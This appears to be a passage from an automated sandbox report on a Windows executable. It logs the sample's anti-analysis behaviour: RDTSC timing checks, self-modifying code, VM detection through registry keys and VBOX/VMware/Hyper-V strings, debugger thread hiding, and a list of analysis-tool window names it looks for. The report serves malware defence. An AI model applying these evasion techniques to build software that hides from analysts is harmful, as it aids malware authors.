Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51FE2E second address: 51FE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51FE37 second address: 51FE3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51FE3D second address: 51FE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47C8DB second address: 47C8E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524390 second address: 5243B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F3D90F37F16h 0x00000011 jmp 00007F3D90F37F27h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5243B8 second address: 5243D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F3D90D93B46h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524523 second address: 524527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524800 second address: 52480F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F3D90D93B46h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524AE9 second address: 524AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3D90F37F16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524C66 second address: 524C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524C6A second address: 524C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52FE72 second address: 52FE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3D90D93B46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530004 second address: 530008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530008 second address: 530023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3D90D93B51h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530EC7 second address: 530F01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F21h 0x00000007 jmp 00007F3D90F37F1Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3D90F37F25h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538D41 second address: 538D6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F3D90D93B46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F3D90D93B54h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F3D90D93B4Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538D6C second address: 538D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538D72 second address: 538D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5387B5 second address: 5387CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5438C5 second address: 5438C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 472571 second address: 47258F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F1Ch 0x00000009 jne 00007F3D90F37F1Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54B95C second address: 54B962 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55ABAD second address: 55ABB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55ABB8 second address: 55ABBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55ABBC second address: 55ABCC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3D90F37F16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55ABCC second address: 55ABE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55ABE8 second address: 55ABEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55CAAA second address: 55CAAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55CAAF second address: 55CAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55CAB5 second address: 55CABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55CABD second address: 55CACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F3D90F37F1Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 562087 second address: 56209A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Dh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56740B second address: 567415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3D90F37F16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5675AE second address: 5675B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5675B4 second address: 5675DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F3D90F37F16h 0x0000000e jmp 00007F3D90F37F28h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5675DA second address: 5675DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56775D second address: 567761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5678EB second address: 5678F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5678F2 second address: 5678FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F3D90F37F16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567BE9 second address: 567BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jno 00007F3D90D93B48h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567BFE second address: 567C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567C02 second address: 567C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 568633 second address: 568654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3D90F37F27h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 568654 second address: 568681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D90D93B59h 0x00000008 jmp 00007F3D90D93B4Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 568681 second address: 56868A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56868A second address: 568690 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56DB0C second address: 56DB10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56DB10 second address: 56DB16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57168E second address: 5716A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007F3D90F37F1Fh 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5732A3 second address: 5732A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5730FB second address: 573123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F3D90F37F27h 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F3D90F37F1Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57C5D8 second address: 57C5DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57C5DF second address: 57C610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F3D90F37F20h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F3D90F37F22h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57C610 second address: 57C616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57C616 second address: 57C61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58CFE5 second address: 58CFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90D93B52h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58CFFB second address: 58D001 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58D001 second address: 58D045 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3D90D93B57h 0x00000008 jmp 00007F3D90D93B53h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jp 00007F3D90D93B4Ch 0x00000016 pushad 0x00000017 jnl 00007F3D90D93B46h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58CD6B second address: 58CD71 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59BD86 second address: 59BDA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F3D90D93B52h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59CA85 second address: 59CA89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59CBCA second address: 59CC01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3D90D93B46h 0x0000000a ja 00007F3D90D93B52h 0x00000010 push edx 0x00000011 jmp 00007F3D90D93B58h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59E4D8 second address: 59E4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F3D90F37F18h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59E4E9 second address: 59E4FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A0F44 second address: 5A0F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A1440 second address: 5A146C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3D90D93B4Dh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A146C second address: 5A1470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A1470 second address: 5A14AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3D90D93B4Bh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F3D90D93B59h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push ecx 0x00000018 js 00007F3D90D93B4Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A44FC second address: 5A4518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F3D90F37F18h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A4518 second address: 5A4539 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3D90D93B59h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A4539 second address: 5A453D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A617B second address: 5A6188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F3D90D93B46h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A6188 second address: 5A618C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A618C second address: 5A6192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A6192 second address: 5A61B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D90F37F29h 0x00000009 js 00007F3D90F37F16h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC043B second address: 4FC044A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC044A second address: 4FC04DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3D90F37F1Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F3D90F37F21h 0x00000017 and cx, 2D36h 0x0000001c jmp 00007F3D90F37F21h 0x00000021 popfd 0x00000022 mov ax, 4927h 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 jmp 00007F3D90F37F28h 0x0000002e mov edi, ecx 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F3D90F37F23h 0x0000003a rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 30DD40 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 53ED53 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Found evaded block containing many API calls

Source: C:\Users\user\Desktop\file.exe

Evaded block: after key decision

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000340F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_000340F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0002E530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00021710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00021710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0002F7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000347C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_000347C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00033B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00033B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00034B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00034B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0002DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0002EE20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0002BE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0002DF10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00021160 GetSystemInfo,ExitProcess,

0_2_00021160

Source: file.exe, file.exe, 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1800359502.0000000001032000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWn
Source: file.exe, 00000000.00000002.1800359502.0000000001032000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareQ
Source: file.exe, 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1800359502.0000000001004000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
